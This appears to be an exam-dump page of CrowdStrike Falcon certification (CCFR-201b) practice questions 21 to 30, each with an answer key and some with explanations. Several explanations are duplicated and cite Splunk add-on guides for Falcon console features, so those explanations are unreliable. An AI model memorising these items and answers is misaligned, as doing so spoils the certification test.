Practice Free CCFR-201b Exam Online Questions
Question #21
In Falcon Search, what does the tag "suspicious behavior" typically indicate during a query?
- A . Malware installation
- B . Unusual process execution
- C . File encryption
- D . System reboot
Correct Answer: B
Question #22
The function of Machine Learning Exclusions is to___________.
- A . stop all detections for a specific pattern ID
- B . stop all sensor data collection for the matching path(s)
- C . Stop all Machine Learning Preventions but a detection will still be generated and files will still be uploaded to the CrowdStrike Cloud
- D . stop all ML-based detections and preventions for the matching path(s) and/or stop files from being uploaded to the CrowdStrike Cloud
Correct Answer: D
D
Explanation:
According to the CrowdStrike Falcon® Data Replicator (FDR) Add-on for Splunk Guide, Machine Learning Exclusions allow you to exclude files or directories from being scanned by CrowdStrike’s machine learning engine, which can reduce false positives and improve performance2. You can also choose whether to upload the excluded files to the CrowdStrike Cloud or not2.
D
Explanation:
According to the CrowdStrike Falcon® Data Replicator (FDR) Add-on for Splunk Guide, Machine Learning Exclusions allow you to exclude files or directories from being scanned by CrowdStrike’s machine learning engine, which can reduce false positives and improve performance2. You can also choose whether to upload the excluded files to the CrowdStrike Cloud or not2.
Question #23
Which actions can be performed using RTR to remediate a threat on an infected host? (Choose two)
- A . Schedule a future system scan
- B . Delete malicious files
- C . Terminate malicious processes
- D . Reboot the entire CID
Correct Answer: BC
Question #24
What role does collaboration play in event investigation?
- A . It is unnecessary and slows down the process
- B . It allows for sharing of tasks and expertise
- C . It complicates decision-making
- D . It focuses only on legal aspects
Correct Answer: B
Question #25
Which of the following actions can be performed directly from the search tool interface in Falcon?
- A . Engage with support
- B . Manage user roles
- C . Download event data
- D . Change account settings
Correct Answer: C
Question #26
What does the Full Detection Details option provide?
- A . It provides a visualization of program ancestry via the Process Tree View
- B . It provides a visualization of program ancestry via the Process Activity View
- C . It provides detailed list of detection events via the Process Table View
- D . It provides a detailed list of detection events via the Process Tree View
Correct Answer: A
A
Explanation:
According to the CrowdStrike Falcon Devices Add-on for Splunk Installation and Configuration Guide v3.1.5+, the Full Detection Details option allows you to view detailed information about a detection, such as detection ID, severity, tactic, technique, description, etc1. You can also view the events generated by the processes involved in the detection in different ways, such as process tree, process timeline, or process activity1. The process tree view provides a visualization of program ancestry, which shows the parent-child and sibling relationships among the processes1. You can also see the event types and timestamps for each process1.
A
Explanation:
According to the CrowdStrike Falcon Devices Add-on for Splunk Installation and Configuration Guide v3.1.5+, the Full Detection Details option allows you to view detailed information about a detection, such as detection ID, severity, tactic, technique, description, etc1. You can also view the events generated by the processes involved in the detection in different ways, such as process tree, process timeline, or process activity1. The process tree view provides a visualization of program ancestry, which shows the parent-child and sibling relationships among the processes1. You can also see the event types and timestamps for each process1.
Question #27
Where can MITRE ATT&CK tactics and techniques be directly viewed in the Falcon platform?
- A . Process Timeline
- B . Full Detection Details
- C . Host Search Results
- D . Real Time Response Session
Correct Answer: B
Question #28
In the context of event investigation, what does the term "root cause analysis" refer to?
- A . The process of reinstalling software
- B . Identifying the underlying reason for an issue
- C . Updating systems to mitigate vulnerabilities
- D . Backing up data before an incident
Correct Answer: B
Question #29
To isolate anomalies in large event logs, responders should use __________ and conditional filters in Event Search.
- A . IOC tags
- B . Prevalence scores
- C . Logical operators
- D . Host groups
Correct Answer: C
Question #30
Which Executive Summary dashboard item indicates sensors running with unsupported versions?
- A . Detections by Severity
- B . Inactive Sensors
- C . Sensors in RFM
- D . Active Sensors
Correct Answer: C
C
Explanation:
According to the CrowdStrike Falcon Devices Add-on for Splunk Installation and Configuration Guide v3.1.5+, the Executive Summary dashboard provides an overview of your sensor health and activity1. It includes various items, such as Active Sensors, Inactive Sensors, Detections by Severity, etc1. The item that indicates sensors running with unsupported versions is Sensors in RFM (Reduced Functionality Mode)1. RFM is a state where a sensor has limited functionality due to various reasons, such as license expiration, network issues, tampering attempts, or unsupported versions1. You can see the number and percentage of sensors in RFM and the reasons why they are in RFM1.
C
Explanation:
According to the CrowdStrike Falcon Devices Add-on for Splunk Installation and Configuration Guide v3.1.5+, the Executive Summary dashboard provides an overview of your sensor health and activity1. It includes various items, such as Active Sensors, Inactive Sensors, Detections by Severity, etc1. The item that indicates sensors running with unsupported versions is Sensors in RFM (Reduced Functionality Mode)1. RFM is a state where a sensor has limited functionality due to various reasons, such as license expiration, network issues, tampering attempts, or unsupported versions1. You can see the number and percentage of sensors in RFM and the reasons why they are in RFM1.